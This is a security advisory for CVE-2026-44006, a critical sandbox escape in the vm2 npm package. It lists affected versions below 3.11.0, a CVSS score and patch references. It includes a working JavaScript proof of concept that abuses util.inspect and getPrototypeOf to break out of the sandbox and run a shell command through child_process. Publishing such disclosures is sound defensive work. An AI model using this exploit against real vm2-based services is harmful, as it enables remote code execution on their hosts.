CVE-2026-44006
CRITICAL10.0EPSS 0.06%vm2 has a Sandbox Escape Vulnerability
Description
### Summary It is possible to reach `BaseHandler.getPrototypeOf`, which can be used to get arbitrary prototypes ### Details https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658 `BaseHandler` can be reached via `util.inspect` (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8) ### PoC ```js let obj = { subarray: Buffer.prototype.inspect, slice: Buffer.prototype.slice, hexSlice: () => '', }; let sym; obj.slice(10, { showHidden: true, showProxy: true, depth: 10, stylize(a) { const handler = this.seen && this.seen[1]; if (handler && handler.getPrototypeOf) { gP = handler.getPrototypeOf; HObjectProto = gP(gP(gP(gP(Buffer)))); HObject = HObjectProto.constructor; sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0); } return a; }, }); obj = { [sym]: (depth, opt, inspect) => { inspect.constructor('return process')() .getBuiltinModule('child_process') .execSync('id', { stdio: 'inherit' }); }, valueOf: undefined, constructor: undefined, }; WebAssembly.compileStreaming(obj).catch(() => {}); ``` ### Impact Sandbox Escape -> RCE
Affected packages (1)
- npm/vm2from 0, < 3.11.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL10.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
References (5)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-44006
- PATCHhttps://github.com/patriksimek/vm2
- WEBhttps://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658
- WEBhttps://github.com/patriksimek/vm2/releases/tag/v3.11.0
- WEBhttps://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8